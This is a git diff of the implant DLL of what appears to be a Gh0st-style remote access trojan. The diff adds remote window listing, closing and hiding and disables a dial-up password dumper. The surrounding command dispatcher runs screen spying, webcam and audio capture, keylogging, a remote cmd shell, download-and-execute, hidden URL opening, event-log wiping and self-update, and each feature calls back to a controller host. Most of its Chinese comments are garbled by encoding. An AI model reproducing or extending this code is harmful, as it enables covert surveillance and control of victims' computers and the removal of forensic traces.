diff --git a/CcMainDll/.vs/CcMainDll/v15/.suo b/CcMainDll/.vs/CcMainDll/v15/.suo
index 25ba38c..dc6f37a 100644
Binary files a/CcMainDll/.vs/CcMainDll/v15/.suo and b/CcMainDll/.vs/CcMainDll/v15/.suo differ
diff --git a/CcMainDll/CcMainDll/Debug/CcMainDll.log b/CcMainDll/CcMainDll/Debug/CcMainDll.log
index e1be6a8..b0820a3 100644
--- a/CcMainDll/CcMainDll/Debug/CcMainDll.log
+++ b/CcMainDll/CcMainDll/Debug/CcMainDll.log
@@ -79,8 +79,8 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\shellmanager.cpp(52): warning C4996
   SystemManager.cpp
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\dialupass.h(62): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
   d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
-f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(119): warning C4018: “<”: 有符号/无符号不匹配
-f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(210): warning C4101: “cbNeeded”: 未引用的局部变量
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(137): warning C4018: “<”: 有符号/无符号不匹配
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(228): warning C4101: “cbNeeded”: 未引用的局部变量
   VideoCap.cpp
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(118): warning C4101: “gCapTureParms”: 未引用的局部变量
   VideoManager.cpp
diff --git a/CcMainDll/CcMainDll/common/KernelManager.cpp b/CcMainDll/CcMainDll/common/KernelManager.cpp
index 07e6cbd..7709e8c 100644
--- a/CcMainDll/CcMainDll/common/KernelManager.cpp
+++ b/CcMainDll/CcMainDll/common/KernelManager.cpp
@@ -56,23 +56,23 @@ void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
 	case COMMAND_ACTIVED:
 		InterlockedExchange((LONG *)&m_bIsActived, true);
 		break;
-	case COMMAND_LIST_DRIVE: // �ļ�����
+	case COMMAND_LIST_DRIVE:		// �ļ�����
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager, 
 			(LPVOID)m_pClient->m_Socket, 0, NULL, false);
 		break;
-	case COMMAND_SCREEN_SPY: // ��Ļ�鿴
+	case COMMAND_SCREEN_SPY:		// ��Ļ�鿴
  		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
  			(LPVOID)m_pClient->m_Socket, 0, NULL, true);
 		break;
-	case COMMAND_WEBCAM: // ����ͷ
+	case COMMAND_WEBCAM:			// ����ͷ
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
 			(LPVOID)m_pClient->m_Socket, 0, NULL);
 		break;
-	case COMMAND_AUDIO: // ����ͷ
+	case COMMAND_AUDIO:				// ����ͷ
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,
 			(LPVOID)m_pClient->m_Socket, 0, NULL);
 		break;
-	case COMMAND_SHELL: // Զ��sehll
+	case COMMAND_SHELL:				// Զ��shell-CMD
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager, 
 			(LPVOID)m_pClient->m_Socket, 0, NULL, true);
 		break;
@@ -80,39 +80,43 @@ void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
 			(LPVOID)m_pClient->m_Socket, 0, NULL);
 		break;
-	case COMMAND_SYSTEM: 
+	case COMMAND_SYSTEM:			// ����
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
 			(LPVOID)m_pClient->m_Socket, 0, NULL);
 		break;
+	case COMMAND_WSLIST:			// ����
+		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_WindowManager,
+			(LPVOID)m_pClient->m_Socket, 0, NULL);
+		break;
 
-	case COMMAND_DOWN_EXEC: // ������
+	case COMMAND_DOWN_EXEC:			// ������
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
 			(LPVOID)(lpBuffer + 1), 0, NULL, true);
-		Sleep(100); // ���ݲ�����
+		Sleep(100);					// ���ݲ�����
 		break;
-	case COMMAND_OPEN_URL_SHOW: // ��ʾ����ҳ
+	case COMMAND_OPEN_URL_SHOW:		// ��ʾ����ҳ
 		OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
 		break;
-	case COMMAND_OPEN_URL_HIDE: // ���ش���ҳ
+	case COMMAND_OPEN_URL_HIDE:		// ���ش���ҳ
 		OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
 		break;
-	case COMMAND_REMOVE: // �,
+	case COMMAND_REMOVE:			// �,
 		UnInstallService();
 		break;
-	case COMMAND_CLEAN_EVENT: // �����־
+	case COMMAND_CLEAN_EVENT:		// �����־
 		CleanEvent();
 		break;
 	case COMMAND_SESSION:
 		CSystemManager::ShutdownWindows(lpBuffer[1]);
 		break;
-	case COMMAND_RENAME_REMARK: // �ı�ע
+	case COMMAND_RENAME_REMARK:		// �ı�ע
 		SetHostID(m_strServiceName, (LPCTSTR)(lpBuffer + 1));
 		break;
-	case COMMAND_UPDATE_SERVER: // ���·����
+	case COMMAND_UPDATE_SERVER:		// ���·����
 		if (UpdateServer((char *)lpBuffer + 1))
 			UnInstallService();
 		break;
-	case COMMAND_REPLAY_HEARTBEAT: // �ظ�������
+	case COMMAND_REPLAY_HEARTBEAT:	// �ظ�������
 		break;
 	}	
 }
diff --git a/CcMainDll/CcMainDll/common/SystemManager.cpp b/CcMainDll/CcMainDll/common/SystemManager.cpp
index a1904f1..566d32b 100644
--- a/CcMainDll/CcMainDll/common/SystemManager.cpp
+++ b/CcMainDll/CcMainDll/common/SystemManager.cpp
@@ -17,9 +17,17 @@
 // Construction/Destruction
 //////////////////////////////////////////////////////////////////////
 
-CSystemManager::CSystemManager(CClientSocket *pClient) : CManager(pClient)
+CSystemManager::CSystemManager(CClientSocket *pClient, BYTE bHow) : CManager(pClient)
 {
-	SendProcessList();
+	m_caseSystemIs = bHow;
+	if (m_caseSystemIs == COMMAND_SYSTEM)     //����ǻ�ȡ����
+	{
+		SendProcessList();
+	}
+	else if (m_caseSystemIs == COMMAND_WSLIST)   //����ǻ�ȡ����
+	{
+		SendWindowsList();
+	}
 }
 
 CSystemManager::~CSystemManager()
@@ -28,20 +36,26 @@ CSystemManager::~CSystemManager()
 }
 void CSystemManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
 {
+
 	SwitchInputDesktop();
-	switch (lpBuffer[0])
+	switch (lpBuffer[0])//�����ǽ��̹����������ݵĺ����� �ж����ĸ�����
 	{
-	case COMMAND_PSLIST:
-		SendProcessList();
+	case COMMAND_PSLIST:				//���ͽ����б�
+		SendProcessList();	
 		break;
-	case COMMAND_WSLIST:
+	case COMMAND_WSLIST:				//���ʹ����б�
 		SendWindowsList();
 		break;
-	case COMMAND_DIALUPASS:
-		SendDialupassList();
+	case COMMAND_DIALUPASS:				//����20200530
 		break;
-	case COMMAND_KILLPROCESS:
+	case COMMAND_KILLPROCESS:			//�رս���
 		KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);
+	case COMMAND_WINDOW_CLOSE:			//�رմ���
+		CloseTheWindow(lpBuffer + 1);	
+		break;
+	case COMMAND_WINDOW_TEST:			//�����С�� ���ش��ں�
+		ShowTheWindow(lpBuffer + 1);    
+		break;
 	default:
 		break;
 	}
@@ -64,14 +78,18 @@ void CSystemManager::SendProcessList()
 void CSystemManager::SendWindowsList()
 {
 	UINT	nRet = -1;
+	//��ȡ�����б�����
 	LPBYTE	lpBuffer = getWindowsList();
 	if (lpBuffer == NULL)
 		return;
 
+	//���ͱ������Ĵ�������
 	Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
 	LocalFree(lpBuffer);	
 }
 
+
+//����20200530
 void CSystemManager::SendDialupassList()
 {
 	CDialupass	pass;
@@ -280,6 +298,7 @@ LPBYTE CSystemManager::getProcessList()
 	return lpBuffer;	
 }
 
+//��Ȩ
 bool CSystemManager::DebugPrivilege(const char *PName,BOOL bEnable)
 {
 	BOOL              bResult = TRUE;
@@ -312,6 +331,7 @@ void CSystemManager::ShutdownWindows( DWORD dwReason )
 	DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);	
 }
 
+//���ڻص��������д���
 bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
 {
 	DWORD	dwLength = 0;
@@ -321,21 +341,27 @@ bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
 	
 	char	strTitle[1024];
 	memset(strTitle, 0, sizeof(strTitle));
+	//��ȡ�������Ĵ��ھ���ı���
 	GetWindowText(hwnd, strTitle, sizeof(strTitle));
-	
+	//�жϴ����Ƿ�ɼ��������Ƿ�Ϊ��
 	if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0)
 		return true;
 	
-	
+	//���ָ��Ϊ�յĻ�����һ����
+	//���ú���ʱѭ�������Եڶ��ν����Ͳ��ǿյģ��ö�̬��LocalReAlloc�ı�Ѵ�Сʵ�����ݶ���һ�����ϣ�
 	if (lpBuffer == NULL)
+		//��һ�������СΪ1����Ϊ��һ�ֽ�Ϊ֪ͨ���ƶ˱�ʶ
 		lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1);
 	
 	dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1;
 	dwOffset = LocalSize(lpBuffer);
 	
+	//���㻺������С
 	lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
 	
+	//��ȡ���ڵĴ����� + ����memcpy���ݽṹΪ ������PID + hwnd + ���ڱ��� + 0
 	GetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset));
+	memcpy((lpBuffer + dwOffset), &hwnd, sizeof(DWORD));
 	memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1);
 	
 	*(LPBYTE *)lParam = lpBuffer;
@@ -343,6 +369,8 @@ bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
 	return true;
 }
 
+
+//��ȡ�����б�����
 LPBYTE CSystemManager::getWindowsList()
 {
 	LPBYTE	lpBuffer = NULL;
@@ -350,6 +378,27 @@ LPBYTE CSystemManager::getWindowsList()
 	//ö����Ļ�ϵ����еĶ��㴰�ڣ������ؽ���Щ���ڵľ�����ݸ�һ��Ӧ�ó�����Ļص�������
 	//EnumWindows��һֱ������ȥ��ֱ��ö�������еĶ��㴰�ڣ����߻ص�����������FALSE.
 	EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer);
+
+	//����ͷ���TOKEN_WSLIST���ض�ʶ��
 	lpBuffer[0] = TOKEN_WSLIST;
 	return lpBuffer;	
 }
+
+
+//�رմ���
+void CSystemManager::CloseTheWindow(LPBYTE buf)
+{
+	DWORD hwnd;
+	memcpy(&hwnd, buf, sizeof(DWORD));				//�õ����ھ�� 
+	::PostMessage((HWND__ *)hwnd, WM_CLOSE, 0, 0);	//�򴰿ڷ��͹ر���Ϣ
+}
+
+//��ʾ����
+void CSystemManager::ShowTheWindow(LPBYTE buf)
+{
+	DWORD hwnd;
+	DWORD dHow;
+	memcpy((void*)&hwnd, buf, sizeof(DWORD));				//�õ����ھ��
+	memcpy(&dHow, buf + sizeof(DWORD), sizeof(DWORD));		//�õ����ڴ�������
+	ShowWindow((HWND__ *)hwnd, dHow);
+}
\ No newline at end of file
diff --git a/CcMainDll/CcMainDll/common/SystemManager.h b/CcMainDll/CcMainDll/common/SystemManager.h
index 21bd68f..9d86e95 100644
--- a/CcMainDll/CcMainDll/common/SystemManager.h
+++ b/CcMainDll/CcMainDll/common/SystemManager.h
@@ -14,7 +14,7 @@
 class CSystemManager : public CManager  
 {
 public:
-	CSystemManager(CClientSocket *pClient);
+	CSystemManager(CClientSocket *pClient, BYTE bHow);//bHow�Ǵ��������ܵı�־
 	virtual ~CSystemManager();
 	virtual void OnReceive(LPBYTE lpBuffer, UINT nSize);
 
@@ -22,6 +22,8 @@ public:
 	static bool CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam);
 	static void ShutdownWindows(DWORD dwReason);
 private:
+	BYTE m_caseSystemIs;//���캯�����ʼ������������������ֽ��̻��ߴ��ڵı���
+
 	BOOL GetProcessFullPath(DWORD dwPID, TCHAR pszFullPath[MAX_PATH]);
 	BOOL DosPathToNtPath(LPTSTR pszDosPath, LPTSTR pszNtPath);
 	LPBYTE getProcessList();
@@ -30,6 +32,8 @@ private:
 	void SendWindowsList();
 	void SendDialupassList();
 	void KillProcess(LPBYTE lpBuffer, UINT nSize);
+	void ShowTheWindow(LPBYTE buf);
+	void CloseTheWindow(LPBYTE buf);
 };
 
 #endif // !defined(AFX_SYSTEMMANAGER_H__26C71561_C37D_44F2_B69C_DAF907C04CBE__INCLUDED_)
diff --git a/CcMainDll/CcMainDll/common/loop.h b/CcMainDll/CcMainDll/common/loop.h
index 520db10..3e67c68 100644
--- a/CcMainDll/CcMainDll/common/loop.h
+++ b/CcMainDll/CcMainDll/common/loop.h
@@ -110,19 +110,35 @@ DWORD WINAPI Loop_KeyboardManager(SOCKET sRemote)
 	return 0;
 }
 
+//���̱����ص�����
 DWORD WINAPI Loop_SystemManager(SOCKET sRemote)
 {	
 	CClientSocket	socketClient;
 	if (!socketClient.Connect(CKernelManager::m_strMasterHost, CKernelManager::m_nMasterPort))
 		return -1;
 	
-	CSystemManager	manager(&socketClient);
+	CSystemManager	manager(&socketClient, COMMAND_SYSTEM);
 	
 	socketClient.run_event_loop();
 
 	return 0;
 }
 
+//�����̻߳ص�����
+DWORD WINAPI Loop_WindowManager(SOCKET sRemote)
+{
+	CClientSocket	socketClient;
+	if (!socketClient.Connect(CKernelManager::m_strMasterHost, CKernelManager::m_nMasterPort))
+		return -1;
+
+	CSystemManager	manager(&socketClient, COMMAND_WSLIST);
+
+	socketClient.run_event_loop();
+
+	return 0;
+}
+
+
 DWORD WINAPI Loop_DownManager(LPVOID lparam)
 {
 	int	nUrlLength;
diff --git a/bin/server/CcMainDll.dll b/bin/server/CcMainDll.dll
index c1d7133..f3a4846 100644
Binary files a/bin/server/CcMainDll.dll and b/bin/server/CcMainDll.dll differ
diff --git a/common/macros.h b/common/macros.h
index 993385c..442cc78 100644
--- a/common/macros.h
+++ b/common/macros.h
@@ -61,6 +61,9 @@ enum
 	COMMAND_WSLIST,					// �����б�
 	COMMAND_DIALUPASS,				// ��������
 	COMMAND_KILLPROCESS,			// �رս���
+	COMMAND_WINDOW_CLOSE,			// �رմ���
+	COMMAND_WINDOW_TEST,			// ��������
+
 	COMMAND_SHELL,					// cmdshell
 	COMMAND_SESSION,				// �Ự�������ػ���������ע��, ж�أ�
 	COMMAND_REMOVE,					// ж�غ���